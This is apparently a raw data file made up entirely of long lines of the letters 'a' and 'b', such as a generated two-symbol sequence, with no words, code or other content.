baabbababaaaabbbabbbababbaabaaabbbaaaabaabababbbbababbbaaabbbbbbaabbbbaaaabaaabbbabbbaabbbbbbaabaaabbabbbbbabaabaabbbbaababaabbbaaaaaaabababbbbababbbbbbabbabbabbbabbbbbaabaabbbabbabbaaaababbbaababaaaaaaaaabaaaabaaababaabaababbaabaaaabbaabbaabaababbabbaabbabaababbbaaabaabaabbababaaabbabbbbbabaaaaabbabbbaaabbbbbbabaabbbbbbbbbbabbbbbbbbbaaababbbababaababaabaaaaabbababbbabbbabbbbbaaaaaabaabababbbaababaabbabbaaababbbabbbaabbbaabaabbabbabbaaaaabbbbbaaaaababbbbabaabaaaabbbabbaaabbbaabbababbbabaabbbaababaabbbbaababbbbbbaaababbababbabbbabbbabaabbaaabbbbaababbabbbaabaabbbaabbabaabaabaabbbababbaaabbbabbabbaaabbbbbbbabbbbbababaababaababaabbbbababbabbbbbaababaababbababbaaaabaaaaabaaabaabbababaaabbbbaabbaaaaabababbbbbbabbbbaaaabaabaaaabaabaabbbabababaabbbbbabbaaaababbaaababaabaabaabaabbbbbbaababaababbbbabbaaabbaababbabbbabbaaaabaabbaabaaaaabbabbbaabbaaabbbbabaaabaababbbbabbabbabbbbabbababaabbbabbaabbabaaaaabbabbbbabbbabababbbbbabababbbbaaabababbabbbabaabaabbaabaabaababaababbbbaabaaaabaabababbaaabbabaabaabbabbbabbbabbaaaababbabaaabbabababaabbbaababababbabbbbaabbbabbbababbaaabbbbaaabbaabbbabbaaaabababbabbbaabaaabaababbababaaaaabbbbaaabbabbabbbababaaabababaaabababbaababbaababbabaabababaaaaabbbbbbabbaabababbbbababaabbaaaaaaaaabbbaabbaabbbbbabaabbabbbabaaabaaabbbbbbaabbaabbabbbabbaaabbabbababbbaabaaaababaabababbbaabbaabbbaabaaabaabbaaabbbbaaababbbaaaabbbabaabbaaabbaabaaabbabaababaabaabaabbaababaaabaababbbababaabbabbbbbababababbabbbbabaaabbbbababaaabaaabbbbababbbaaaaaaaabaaabaabbaabaaaaabbbbaababbbbabbaaabbaababababbaaabaaabaaaaaaaaaababaaabaabbabaabbbaababbbbbbabbbbbaabbbabbbbbabbbbabbababbbaaaabbbbababbbbaabbaabaaaaaaaabaaabaabbbaababaaabbbaaabbababbabbbaabbbbbabbbbabbbaababbbabbbbaababbababbbaaabbbabababbaaaabbbaaaabbaabbababaababbabaaababbbaabaaaabaaabbabbababababaaaabbbbaaaaababbbbabbbbbaaababbbaaaaaabbaaaaabbbabbabaaaaaaabbaabaabbbaaabbaaababbbabaababaabbbbbaabbbbabababbaabbaabbabaaaababbbabaaaaababbaaabbabbbbabbbabbbbbaabbabbbbabaababbbbaabbabaaaababaabbabbbbaabbbbabbaaaaaabbabaaaaaababaabbabbbbabaabbbbbbbabbbbaaabaaabbaaabbaaabbbbbbaababaabaabaabbbbbbbabbbbbbbbaabaabababbaabababbaaaababaabbbbaaabbabaaaaababaababaababaabaabbbbbaaaaaaabaaaabbaabbaaabaaaaababbabbbaaababbaabbabbaabaaabaaababbaaaabbaaabbbabaabbbababaaaaaabbaabbbabbababbbabaabbabbbbaabababbabbaaaabbabbbaaabbaabababbbbbbabaaabababaabbbaaaaabaabbbabbbbbbababbbababbbaaaabbaabbbabaabbbaaaaabbabaabbbaabbaaabaabbbbaaaaaaaabbbaaaabbbbbaababaabaababababbbbbbabbbbbaabbbbbbbaabbaabaabbbaaaaaaaababbbaabaabbabbaaaaabaabaababbbaaaabbbbababbbaabbbbaababaabbaabbaaabababbbbbabaabbaaabbbbaabbbababaabbaababaaaaabbaaaabbbabbbbbabaaaaabbbbbbbaaabbbbbabbbbbaabaabaababbbbbbbabbbaabaabbbbbbaaabaababaaabbbaabbabbbbabababbbabbbbbbbbbbbbaabbbabbaabbbabaabbbbabbabbaaaaabbabbbbbbbabaaabaabbbbbabbababaaaabbbababbababaaabbbbaabbbababbbbabbbabbaabaabbabababbaabbbbaabababbabbbbaaaababbabaabaaaaaaaabbbaaabbbbababaabbaabbababbbbaabbaababbaabbaaabbbababaababbbaaaabbaabaabbbaaabbbbbbbbaaaaaabbbbbbbaabbbaaababbbaaaaabaaabbbaabbbbbaaabaaaabbbbaabbbaaabbbaabbabbbbabababbbbbaaaaababbabaaababbaabaabaabababbaabababbbbbbbaabaababbbbbbaabaaaaabababbabbabbabaaabbbbaaabaaababbbabbbabbabbaaababbbababababbbbbaaababaaabbbbbbbbbbaaaabbabbbbbbbbbbbabbaabbbbaaaabbabaaaabbaaabbabaabaaabbaaaaabbaaabbababaaaaaabaaabbabbabbbabbbabaaabbaababaabbaaabaaababaabbbbabbabaaaabababbaabbbabbbaabbabbaaaabaaaabbabbbaababaababababbbaababaaaaaababbbbabaaabaaaabbaaabbaaabaaabaabaabaabaaabaabaaabbaababababaaaaaabaaaabbbbbaabbbabbbbbaabababbabbaaaababbbbbabbaaabbababababaabbbbabaaabbaabbabbbbbabbbbababbbaabbabab
bbbbbaaaaaabbbbbabbbbabbbbbbabbabbaaabbababbbbabababbabaaaabbbbbabaaaaaaabbabbbababaaabbabaaaaaaabbaaababbabaaabaabbaababbabbaaaabbaababbbbabbabaaabaababaababbbaabaabaabbabbbbabbbaaaaaabbbbabbbabababaaabbaababbaaabbbbabbaababaaaaabbaaaaabababaaabababbbbaabbbaaaaaaaabbbabbabaabaabbaababaaaabbbabbbbbbababbbbbaaaaababbbbbabaabbbaaaabaabbaabbbaabbbabbabbaabbabbaaaaaabaabaaabbabbabaaaabbabbabbaaabaaabaabbababababaabbbbbbbbbbbabbbbbbabbaaabaaaabbbbaaaaababbaaabababbbbbbababbbbbbabaabbabbabbbbbbabbaabaaaabbabbaaabbabbbaaabaaabaaaabbaaaabaabbabbabaabbaaabbbbbaaaaaabbbabbbbababbabbbbbaaabababbabbbabbabaababbaaabaababababbabaaabbabaaaabbabbbaaabbbabbababababbbbabbabbaaaabbbbbbbabbbaababbaabbabbabbabbbbbaababbaabbababaaaabaabbaabaabaabbababbababaaaabbabbbabbaabbaabbbababbbbbaaabababbaaabaaabababaababbaabbbbbbabbbaaaababaabbbabbbbabaaaabaabbaaaaaaaaaaabbbbbbabbaaabababbbabbbabbababbbbaaabaaaaaaaabaabaaaabbbabaaaaaababbbabaabbbabaabbbbaababaaaaababababbabbabaaabbaabbbbbabbaabbabababbaaaaabaaabaaabaabbbababbbaaaabaaabbabaaabbabbabbbbaaabbababbbaabaaaabaaabbaababbbbbaabaaaababbababbbabbbabbbaabbbabaabaabbaabbbbbbbbaaaaaaaababbaabababaaaaaabababbaaabbbbabaabaabaabababbbaaaaaababbbaaabbaaaaababbbbbaaabbabbbaababaaabbbbbbbabbbbabbbbbbbaaabaabaababaaababbbaabbbbabbbaaababababbbaababbbbbabaabababbaabbabaaabbbbbababaaaaaaaaaaabbabbbbabbbabbabaabbbbbaabbabaaabbabbbbbbaaabbaaababbabbbabbaabbabaaaabaaaabbabbbaabaaaaaabbabbbbaaabaabbbbaabbbaabaaabbbabbabbaabaababababaaaababbababbbbbbbbababaababbbabaaabaabaaabbaabbbbbbbbbbabbbabbaabbbaaabaabbbaaabbbabbababaabbbbbbbaabbaaaabbbabbbbbabaaabbabbaaaabaaabbabbbaabababaaabaabbbabbbaaaaaaaabababbbbbbbabaaababaabbaabbbbaaabaababbababaaabaaaabbbaabaabbbaababaaaabaaababaabbaabbababababbaabbaabbaababbbabbabaaabaabbabaababaabbbabbbbaaabaabababababaaabbabbaabbabaabbbaaabbabbabbbbbabbaaaaaaaababbbabbbbbaabbbabbabaabaaaaaababaababbaaabbaabbbabbbbaabaaaabaabbbbabbbababbabaaaabbabaaabbbabbabaabaabaaaaabaababbaaaabaababbaabbaaaabbbaabbaababaaaabaabaababaaaaabababbbbbaaaabaabbbaaabbabbaabaabaaaabbabababaabaaaabbbbabaababbaabbbababaabaabbaaaaabbabbabbbbaabbbaaabbbaabaaaabbabbbbbabaaaaaabaabbaabbbaaabbabbaabbbabbabaaaaaababababbababbaaaaabbabaaabbababbbbbbaaaaaabaaaabbaabababbaababbabaaaaabbababaaabaaabbbabbaaabaaabbbbabbbbaababbbbbaabbbbbbbbabbaaabaaaaaaababbbbbbbaabaaababbaabbaababaabaaaaaaabbbbaabbbbbbbbbabbabbbababaabbbbaaaabaaabababbbabbbaaabababbababbbbabababbbbbabaaabaabaaaaabbbbabbabbaabbbbbbaabbabbabbabbaaabbbaabbabbbaabbabaaaabbbababbbaabbaaabbbaabaababbbabbbbbbbbabababaabaaaaabaababbababbabbbaaaabbabbababaabababababbbaaabbbabbbaaabbbababbaababaaabaababbbaaabbaaabbaabaabbababbabaaabbabbbbbaaabaabbabbababbbaaabbbbaaaabbbbababbbbbabbabbbbaaabbbaababbbbababaabbababaaababbababbbabababaaabaaabbbbbbbabababbbaaaabaabaaaaaaaababbaaabaaaaabaabaaaabaabbbbbaaabaaabbaabbbabbbbbbaabaaaaabbbbababbbbaabbbbaabbabaaaabbbaabbabbbbbaabbaaaabbbbaababbaaaaaaabbbbbabbaaaabaabbabbaaababaabbbbabaaaabbaaaababbabababaaaaaabababbbabbbbabbbababaaababaabababbbbabbbabbaababaaababbaabbababaaababbbbabaababaabaaaaabbbbabaabbaabaabbaaabbbaabbbbaaaaababbaababababbbaabababbaaaaaaaaaaaaabbbbaabbbabbabaaaabbabbbaaaabababaaabbabbbbaababaaabbbbbababaaaaabbaaaabbbbbaabbbaabaabbaaabaaaabbbbaabbabbaaaabbbbabaaaababbbaaaaabbbbaababaaaabaabbabbbaabababbaabbbaaaaabaaaaababbabbaababaababaabbbbbababbbbaabbbbbabbababaabbabaabaabaababbbbbbbabbbaabbbbbabababaabaabbbbababbbaabaaaaabababaaaabbbaabbabbabbabbaabaabbbababaabbbabbbbabbaaabbaaabbabbabbabababbbaabaabbaabaaabaabbabbbbbbbababbbbabaababbbabbaaaaabababaaaabaaababbabbababab
aaabaaaabbabbbbbaaaabbbaaaabbababbbbaaabbbabbabaabbbbbabbaaabaaaabbbababaaaaabbbaabaabbaabbbbabbabaaaabbaabababaaabbabbbaababbaabaababbbababbaaabababaababbbabbabbbbaababaabbaaaaaaaaabbbbbabbbabbaabaabaaaaababaaabbabaabbaabbbaabbababaababbbabbabbbbabaaabbaabbbabbbbaabbbbababbbbababbababbaaaabbbbbaabaabaaabbbababbbbaaaabbbbbabbbabbabbaabbbabbabbbabbbababaabbbbabbbbbbbbbababaaabbabbbbababbbbbbaabaabaaabbabbbbaaabbbaababbababaabbabaabaaaabbbaabaaaaabaabbabbbaabaaaabbabbbbababbbbabbaababbaaabababbaabababaabaabaaabbabaabaabbabbabbaabbbbbbaaaaaabaabbaabbaaabaaaaabbbbbabbaabbbbababaabbbabbaabaaaaaaabbaabbaabaaabababbaaabbbaaabbbaaabaabaabaaaaababbabbbabbaababbbabbabaabbbaaabbabaabaabaabbaabaaababbabbaaaabaaaabaaaabbabbbbbbaabbbbbabbaaaaabbbbababaababbbbbbababaaaaabbaaababbaababaabaaabaabbaabbbbbabaaabbababaabbbabbababbababbbbbbabbabaabbaaababbbabbbbaaaabaababbaaababbabbabaababbbaabaaababaabbaabbbabbbaaabbabaabbbabaaaaabbaabbabababbabaabaababaaabbbabbbaababbbbababababaabbaaabaabaabbbaaabaaababbaaabaabbbbbabbbbabbaaaabbabbbabbbbabababbabababaaaabaabababbaaabaaabbabbabbaaaaaabaaababaaabbababbbaabbabaaaabbbaaaabbaaaabaabababaabbbababbbbbabbaabbbabbaaabbaaaaabaabaaabbabaabbaabbaaaabababbabbabaaaaaababaaaaaabaababaaababaaabababaaabbabbaaaabababaaabbaabbaabaababaababbaaaabbaaabbabaabaaabbbbaaabaaaaaaaabaaabbababbbbbbbaabbaaaababaaabbbaababaabababaabbaabbaabbababaabbbbaaaababaaabbbbabaabbbbbaabbabbbbbbaabbabbbbabaaabbababaabbabbbbaaabbaababaaabbabbbaabaabaaaaaabbaabbaabbabbbbbabbbabbaabababbaaabaababbaababbbbbbabbabaaaaaabbaabbababbbbbbbabaababbbbbbbbbaabbbbbababaaabbbbbbbaaaaaababaaabbaabaaaabaaaaabababaabbbabaaaabbbabbabaaaabaaaaaaaaaaabbabaaaabbbbbbbbbabaaabbabbaababbaaababababaaaaaaaaabaaabbabbbabaabbbbaabaabababbbbbabaabbabaabbabaaaaaaaaaabaaabaaabaaaaaabbbabbaabbbaaabbbbabbbbbbaabbababbababaaabbbabbabbbbabbaaaaaabbabaabaabababbbabaababbabababaaaaabaababbbbaaababbbabaaaaabaababaabaababbaababababbbaabbbaaaabaabbbaabaabbabbbbbabaaaabbbaabbbbaaaaaabbaaaaaabaabababababbabbaabbaabaaabaaaababbbababbbbbbbabababababbbabaaababbbaabbaaaaabbaabbbaaaabbababababbbabaabbbbbabbbbbaabaabbbbabaaaabbababbbabbaaabbaababaaaababaaabbaabaaaaababbabababaabababaaaabababbbbbabbbbabbaaabbbbbaaabbbbbbbbabbbbaabababbabbbaaaaababbaabbbbababbababbbaabbabaababaaabaaaabaaaaabbaaabaaabaabababbaabaababbbababbbabaaaaaaabaaabbbbaaabaaaaaaaaaabababaaababaabababbbabbbabaaabbabbaaababbbabaabbabaaabbbbaaababaababaabaabbabbbaabaabbabaabbaabaabababaabbabababaaaabbbaaababbbbabaabbaababbbabbbbabaaaababababbaabbbbbbababbbbbaaabbbbaababbbaabaabbaaababababbbabbbababbbababbbabbbbbabababbbabbabaaaabbbbabaaabaaaaabbbaaabaabbaabbbbabaaabaaaaaaabbabbbaaaaabbbaabaabaaabababbbbbbaabbbaaabaabaabaaaabbbbaaaaababaaabaabbbbabbbbaababaabbbbbaabaaaaaaaaabbabbababaabaabbbbbabaabbabaaabbabbabaaababbabbaabaababababaabaaabaabbababaaaaaaaabbbbaaabaaaabaabaababaaabbaaaaaababbbbbbabbbaabbbabbbbabbabbaaabaabbababbabbbabbbbabbbbbabababbbbbabbaaaababbaabaababbaaaababbabbbbbabbabbaabbbabbbbabbaaabababbabaababaaabbbabbbaabaabbbaaaaaaabaabababbbaabbbaabbabbbbbaabaaabbaaaabbbbbaaaabbbbbbabbabbaaabbaababbaabbabaababbbbbbabbaabbbbababaaaabaabaaabaabbababbbabbbbbaaaaaabaaabbbbaaabbbbababaaaababaabbaabababbbbaaaabbbbbabbbababaababaabbabaaababaaaabbaabababbbbbaabbbaaababaabaaabbbbaaabbbaaaaabaababbaaaaabbababbababbbbaabaaabbbbbbbaabbabbaaabaababbaababaabaabbaaabbabbbbbbbaabbbabbbaaabbbabbaabbabbaaaabbabbabbababbbbabaababbaaababababaaaabbabaaabaaaaaaabaaabaabbbbabaabaabbabbabaabbaaaaaaabbbbababaabbbabbababaabbbaaabaabbbaaaaabbaaabaaaabbbabbaabbbaabbabaaabbbbbbabaaababababaabababb
aabbaabbbbbaaabbabbbbabaabbbaaaabbbbaababbbababaaabbaabaabbbaaababbbbbababbababbbabaabbabbababaabbabbabbbaababaabaabbbbbaabaabbbbbabaaabbababababaaabbaabaabaaabbbabbbbbbbaaaababaaabbabbaaabbbababababaaaabababbaaaaababbbabbbbbabbbaababbababbbaaaaaaabaaaaabbbaaababbaaaaabbaaaaabbbbbaaaaaaaaaabaaabbbababaabbaabbbbabbaabbaaaaabaabaaaaaabaaabaaaabbaaaabbbaababbbaaabaaabaabbbbabbbaabababbaaaaabbbaababbaabaabbbaabaaaabbbabbbbbaaabaabbbabababbbbbbbababbaabaabababbbaabaabbaabbbbabaaabbbbbbaabaabaabbaaaabaabbbaabaabbaabaabaabaabaaaabaabbabaabbbbababbbbbababbbabbbaaabbbbaaabaabbaabbaaabbaaabaaabbbbabbbbbaabbbabaaaaabbaaabaabbbbaabaaabbbaaababbbaabbabbabaabbbbbaaabaaababababaaabbbabaababbabbbaabbbaaabbbaaaabbabaababaababbbbaaaaaabbbaaabababababaaabbabababbbbbaabbabbbbabbbabbababbbbbabbabaabbaaababbbbabbaaaaabaaaabbabbbabbabbbbaabaabaaabbaabababbaaabbbbbaaabababababbbbbabaaaaababaaabbbabbabbbaabaabaabbbbbbabaaabaababaaaababaabbbabbbbbaaabbaaabaaaabbbaaabaaabbaaabaabbbbabbabaaaabbabbaababaababaabbbbbabbabbabbbbbabaaababaabbaaaaabbaaabbbababbbbababababaaaaabbbbbabbabbbbbbabaabbbaabbbabbbbababbabbabbabbabaabababbbbbbbaabbbabbaabbbbbabaabbbbabbbaabbabbbbabaabbbaaaabaabbaabbbabaabbabbbababababaabaaabbbbaabaaaabbabbabbaaabababbbbaaabbaabbabbbababbbaaaabbbbaaabaaabababaabbbbaabbabababbbbaaabaabbbbaabaaaaabaabaabbbabaaabbaaaaaaaaaaabaaaaaabaabbbbbaabababaaaabbbbaabaaabaaabbaaaaaaabbbbbaabbbbbaabbaababbaababbbbababbbbabbbbbbabaaabbabbaaaabaabaabbaabbbaaabaabbbaaababbbaaabaabbbabbaababaaabbbaabbbbbabaababbabbaababaaabababaabbbabbbbaabbbbaaaabaabaaaaaabbaabbbbaabaaaabbabbbabbaabaaaabbaabbbbbababaabbabbaaaabbaaaaaabaaabbbaabababababbbbbbbbaaaabbabbbababbaabbaabaaaabbaaabbbabaaabababbbbbaaaabababaababbaababbaaabbbababbaaaaabbababaaabbbabbbaabbabbbaababbaabbbbaaaaabaaaaabbaaaabababbaaabbbbbbaabbbbaabaababbabbabaaaabbaaabbbbbbabbbbbabaabbbbbbaaabbbaaabaabbbbbaabaaabaabbabbaabbbbbaababbaaabababbaaabaabbabababababaaaababaaababbbababaabbbbaaaabbaabaaaaabbabababbaaaaabbbababbbbbabbbaabbabaabaaaaaabaaaababababaabbbabbababaaaaababbbbababbaabbabbbaaabbbaaababbbaaaaaabbabaabbabaababbbbaaaaabaababaabbbaabaaababbabbaabbbbabbabaabbaabbbbbbbbbbabababbbbbabbaabbbbbbabbbabbaabbaaabbaaabaaabbbbaaabaababbabaababaabbaabaaaaababaaabbbbbbbbbbabaaaaabaabbbaaabaabaabbaaabbbaaaabbaabaaabbbbbababbaababbbaaaaaabaababbbabbaabbaaabbabbbbaaaaabaaaabaaaababbabbbababbabaaaaaabbababbaaabbaabaaababbbbaabbbababbaaabbbabbabaaaabaabbbbaaaabbbbbaaabbbababbaaaaababbbbaaaaaabaaaabbbabbbbbabbbbabbaaabaaaaaaababbbbabaaaaabaaaaaabbabababababbaabbaaaaaabbbaaabbaaaaabababbbbaabaaaabaaababbaaabbaababbbbbbbbabbbabbaaabbaababbaababbbaaaabbaababaabaabaaaabaaabbaaabbaabbbaaaabaabbabaaababbabbababbbabaababbababbabbbabbbbbbbababbabababbbaaabaabbababbbbaabaabbabaabbaaaaaabababbaabbbaaabbbababbabaaabaabaaaaaababbbabaabbabbbaaabbaaabbbaabaabbabbabbaabaaabbababbbbaabbabbaabaaabaaabbbabbaabbbbabaabaaaabbbabababababaaaaabbbaaabbaaaabbbabbbbbabbbabbbabaaaaabababababbbaaabaaabbaaaaaababbabbaabbaaabababbabbbbbbbbbababbbbbbbaaabbbabbabbaabaababbbbbaabbababbbabbbbaaaabaababbbabbbbbbbaaaabbbaaababaabbaabaaaaaababbbaaaabaababbbbbbabaaaaaababbbaababbbabbaaaababbabbbbbabbbbbabbbabbabbbaaababbbabaaaaababbbabbaaaababaaaababaaabbbaaaabbaaabaabaaabaabaaabbbabbaaaabbbabbabaabaaabaababbaaabbbbabababbababbbabbabbbbbbbbabbbababbabbbbbaaaababbbbbaabbbaabaababbaaaabaababaabaabababaabbaaabbbaabbbbabbaababbabbaaabbbaababbbabbaaabbaaaababbbabbbbabaabbbaababbbaaabaaaababbbbbaabbbbabbababaaaabbbbabaabaabbaababbabaabbbbbbabbabbbbbbaabaaaabbbbbabaaabaaaaaabbababbbbbabaabbaaabaaababbabbaababaabbbba
bababbbabbabaaabaabbbababbbabaaabaaabaaaaabbabbabbaaaababbaaaaababbaaaababaaabbaabaaabbaabbaabbabbbabaabaabbaaaaaabbaaaaaaabbbbabaaabababaabbbaabbabaaaabbaaabbbbababbaababaabbabbabbbbabbabbabaaabbaabaababbbabaaaabbababbabbabbbabbaaaabbbbbbabababbaaaabbaaaabaaaabababbababbaaabbabababbbbbbabbbabbababbbbbaabbbbbabbbaaabbbbaabaaabaabbbabaabbaabbbbbbbababaabbbbabbbbbbbaabbbaabaabbaaaaaabaaaabaabbaabaaaaaaabaaabbabaaabbabbbbbababbaabaabbababbbaaabbababaaabbaaabbbaabbaabbbbbaabaaabaaabaaabbbaababbaaaabaababbbbbbbabaaaabbaabaabbbabaababbabbabaaabbbabbaabbbabbbbaababbaabaaabbaabbabaaaabaabaababbbaaabaabaaabaabbababbbbabbbababbabaabbbabaababbaabaababbbabaabbbbbabbbaabbabbbaaababaaababbbbbbbaaabababaaaabbaaaaaaabbabbbaabbbbbaaababbbbabaaabbbababababbaabaababbbababbabaaabbbaabaaaaaabbbbabbaabbababbbaaaabbbbabbaabbaaaabaabbbbababbaabbbaababbaabbbabbbbaaaababbbbaabbaaabbbbabbbbaababaaaabbbbaaabaabababbbabbabaaaaaaaabbbbbaaaabbbbbaabbabbbbabbbaaaabababbabbbaababbbaaaaaabbaabaabbaaabbbbaaabaabaaaaaabbabbbaabbbbbaaaaaaabbbbaaabaaabaaabaabbbababaababbbbbaaabaaaabbbaabaaaabaaabaabbaaabbaaaabbabbbababbabbbaaaaaaaaaababbaabbaaaaaabaaababaabbbaaaabbaaabbbababaaaaabbbabaabbabbbaaabababaabbaaaabbabaabbbabaabaababbaabaaaaaabbaaababbabbbaababbbabbbabaaaaabbaaaaaaababbabaaaabaaaaaabaabbbbbaabaababaaaaaaababbbbbabbbaabbabbabbbbbaaabbabbababaaababbabababbbbbbbbbabbbbbbabbbabbaabbbaaaabaaabbbbaaaaaaaabbabbbbbbbbbbaabbaabbbabaabaaaabaaabbaabbabbbaaabaabbbbbaabbaabaabaaababbbbabababbaaababbabbaababbbbaaababaaaaabbbbbabaaaaaabaabababbbabaabbbbabaababbbababbbbbaabbabbaabbabaaabbbbbbbabaaabaabbabbabbaabaaaaaaabaaabbaaabbabaababbabbbbbbabaabaaabbabbaaaaaaabbbabaaaababbbababbbaaaabaaaabaabaaabaaaabaabbaaabbbaabaaabaabaaaabbaabaabbaabbabaabbabbabbaabbbbbbaabbaaabbaaaabaabbbabaaabbbabaabaaaabbbbaaaaabababbbabbbabbaababbbbbabaabbbabbbaaaaabbbabbabbbbaababbbbaabbbbaaaaabaaaaababbabaababababbbbabbbabbaaaaaababbaabbbbaabaabbbababaaaabaabbbaaabaaaababaaababbbaabbbbaabaababbaaabbabababbbbaababaaabababbaabbbaabbabaabaaaaababbbbabbabaabbbaaabaabaabaaabbabaabaabbabaababaaaabaabbaabaabbbabbababbaaabbabaabaaabbbbbbbbaabbaabababbbbbbabbaabaaabbaabaaabbbaaaababaaaaabaabbabaaabbbbbaaaaaabbaabbaaabbaaaabbbbabbaaaababaabbbaabbbbaaababaaabbabbabaaabbbbabbababaaabaabbbabaababaabaabbabbbbaabbabbaabaaaaaabaaabaabaabbabbbaabaabbbaaababaabbabbaaaabbbbbbbaabababaaaabbbbbabbbbbababbbaaaabaabbaaababaabbabaababbbbabbaabbbabbabbbbabababbabababaaaaabbbabaabbbbababbbbbaaabaaabbabbabaabaabbbaaababaababaaababaaabababababbbbbaaaaaabbabaaaaabaabbbbbaababbabbabbabbbbabaabababbaaabaababbbaabababaabbabbababaababbbbaabbbbababbaabbbaabbbabbbaabbbaabaabbaabbbaaababbbbabbbbbabbabbbbaaabbbbbbbababbbabaaabbbabbbaabbbbaaabaaabbabbaaaabbabbababbaababbaaaabaabbabbbbbbaaaaaabbbabbbaabbbbbaaabbbaabaaaabbbabbabbbabbbbbaaaabbbaabbabababaaaabbabbaaaabbababbabbbaaabababbababbaabbabaaaabaabbabbaababbbbbaaaabababbbbaaaabbbabbaaaaaabababbabbabbbaaaabaaaababbbababbbbaaaaababbababaaababaabbbbbabaaabbaabababaaabbaaabbbaabaabaabaaaaabaabaabbababbbbabbaaabbababaabaabaababbababbbbbbbbaaabbabaabababbbaaabbababbaaaaaabaaabbaabbabaaabbaaabbbbababaaaabbabbaabbbbaabaaaabbbaabababbbaabbabbabbbababbbababaabababbbbabbabaabaabaaaaabbabbbbbaaabbabbbbaabaaaabbbaaaabaabbaaaabbbaaaabbbbabbbbabaabbaaababababbbabbbabbaababaaaaabaaaabbbbaaaabbbababbbababaaabbbaabaabbbbbbbbaaababaababbbabbaabbbababbbaabababaaabbabbbabbabbabbaabbaaababbaababbaabaababaaaaabbbaaaabaabababbbaaaaabaaabbabaaabbbababbaababbabbabbbbbabaaaaaaababaabaaaabbbbabbabaaabbbaaaabbaabaaaaabbbbaabbbbbbbbbbaaaabbbaaaaaaabbaabbabbaababbbbbb
aabbaaaabaabaaabaaaaaabababbaabaabaaababaaabababbbabaabbabaabbbaaabbbaabbbabbbabbaaabbbaababbbbbbbabbaabbbaaaaabbaaaabbbbaabaaaabbbbbabbaaaabaaaaaabbbbbabbabababaababbabbbbbbbaabbaaabbaaaaabaaaaaaaabbaaaabbbbbbaabababbaabbbabaababaabbabbaababaaaabbbabbabbabababbbaaaababaaababbaabaabbbbbbabbbaabaabababbaaabaabbaabbabbaaabaabbbbaaaaabbbaaaabbbbabbaabaaaabaaabbbbbaaaaaabaaaabbbabbaaabaaaabbabaaaababbaabaabbabbbbabaaabbabbababaabbaaabbbaaabaaabbabbabaabaabaaaabbabaabbbbabbaaabaabbbaaabbbbabbaaabaaaaaabaaaaaaabababaaaaaabbbbbaaaabaaabbbbaababbabbbbaaababaaabbaabbabaabbbaaabbaaaaaaabaabababbbaabaaabbbbbbaaabbaabbbaabaabababbaaaabbababbbbaaaabbababbaababaaabbbaabaaaaaabbbaaabaabbbbabaababaaaaabbaaaaabbbbabbababbabbbbbbabbabbabaababaaabbbaaabbbabbbaaabbbaaaabbaabbbbaaabaabbaaabbbbaabbabbaaaabbaaaababaababbbbabbbbbababaabbaaababbabbbabaaaaabaabaaabaababbaaabbaaaaabbaaabbbababaabbabaababaabaaabaabbaababbbbbaabaaabaabbbbaaaaabbbbbabaababaabbaaabbaabababbbabbbbbabababbabaaaaabaabbbababbbabaababbbabbaaabaaaabababbaababaabbbbbaababbaabaaabbbabaabbabaaaabbabbbbbabbbababaaabbaabaaabbabababbbbaaababaababaaabbbbaaaabbabbbbaabbbabbabbabababbababbbaaabbbaabaabbababbaababbbbabbbbbaabbbabbbaaaabbaabaabaabbbaabbbabbbabbaaabbbbabbbabaabaababaababbaabbaababbabbabbaabaaabaaaababaababbbbaabbabababbabbbbbbaababbbbbbbbbabaababbbbababaaabbaabaaababbabbbaababbaabbbbabbbbbaaaabbbabaaabbbbbababababbbbbbaabaaaaaabbaaaaaaababbabbaabaabaaabaabbbbbbbbbbbbabaabbaabbbbaaaaabbaaaaababbaabbbbbbabaabaabbbabaabaababaabbbaaaaabbabababbbbbaaabbbbaababbaabaaabababaaabbaaabbbaaabbbabaaabbbbbbbbbbababaaabbbabbaaabaaababbbbabbaabbaaababbbbabbabababaaabbaaaaaaabbabbaaaabaababaaabbaabbbbaaabbaaababbbaabababaabbbbababbaaabbabbbabbabbaaaaabbabbaaaaaabababababaabbaabbabbaabaabababbaabaabbaaabaabbaaabababbbaabbaaaabbabbbbabbbbbbbbbaaaabbbaaabaabaabaaaaabbbaaabbababbaaabbaaaabbabaabababababbababaaabbbbbbbbbaaabaabbbbabbbaaabaaaaaaaabbaaaababbabbbbbaaabbbbbbbbbbbbbabaabaaabbbaaabaabababaabbababbababbbabbbabaaabbabbaabbbbaaabaabbbabbabbbbabbababbbaabbaabbabbabbababbbbbbabbbbbbabbabbbaaababbbaaaabaabbbbbbabbbbaabababbbbbbbbaababababaabbaaaaababaaababaabbabbbababaaabbbaabaaaabbabaabbaaababbabbbbaaabbbbbabaaaaabbbbaaaaaaabaaabbbbbbababababababbaabaaabaaabbbbabbbbaaabbbabbbabaaabbbbbabaaababbaabbbaabaaababbaabbaabbaabbabaabbbaaaababbbabbaabaaabbabbabbbababbbbaabbaabbbbbaababbaaabaaabbabbaabbbbbabaabaabbaaabbaabbbbabaabbbabbabbbabbaaaaababaababbaabaabbbbbabbababbabaaaaaabaabbabababbabbabbabaaaababbabbbaababaaaaabbbbbbaabaaaaabaaaabbbabababbaaabbbabaabaabbbaaaaaaaabbbbbbbbabbbabbbabbaabbabbaaabbbababaaaaaaaaabbbbaaabaaababbbbabaabaaabaaaabbaaaababbbbbbbaaabaaaabbaaabbaaaaabbaaabaaabbbbabbaababaabaaabbbabbbaabbbabbababaaabababbbbababaaabaabbabbbaababbaaababababaaaaaabaaaaaabbbaabbaabbbababbaaaaabbbabbabaabaaabababbbbabbbbabbaabbbaaaabaaabaabbaaabbabbbaaaaababbabbaabaababaabaababbbabaaaaaabbbabbababaabbbbabbbbbbaaabbbabbbaaaabababbaaabbabaaaabbaaaaabaaaabbbabbabaaaababaaabaabbbbbaabaaaaaaaaaaaaaabbbbabbaabbbbabbbaabbabbaababaabaababababababaaabbbbabaabbaaabaababababbbabbaaabaabbaaabababbabbbbbaabbbaabababaabaabbbbbbabbabbabbabaababaababaaabbabbaaabbabbabbababababababaababbbbababaaaabbbaabbaaabbabaabbaabaabbabbabbbbbbbbabbbbbabababababaababbaaaabbabbbabbababaababbaabbbababaaaabbaaabbababbaababbbababaaabaaaabababaaaaaabbbbbabbabbaaabbbbbbbbabbaabbabbaababbbbaababbaabbababbbaababaabaababbbabbabaabababaabaaaaababbbabbbababbbaabbabbbbaaaabbbaaabbbabaabababbabbbbbaabbaabbaaabaaaaaaabbaabaaaaaaabbbbababbababbbabbbbaabbbabaaaabbbabbbaababababbabaabbbaaaaaaaabbbbb
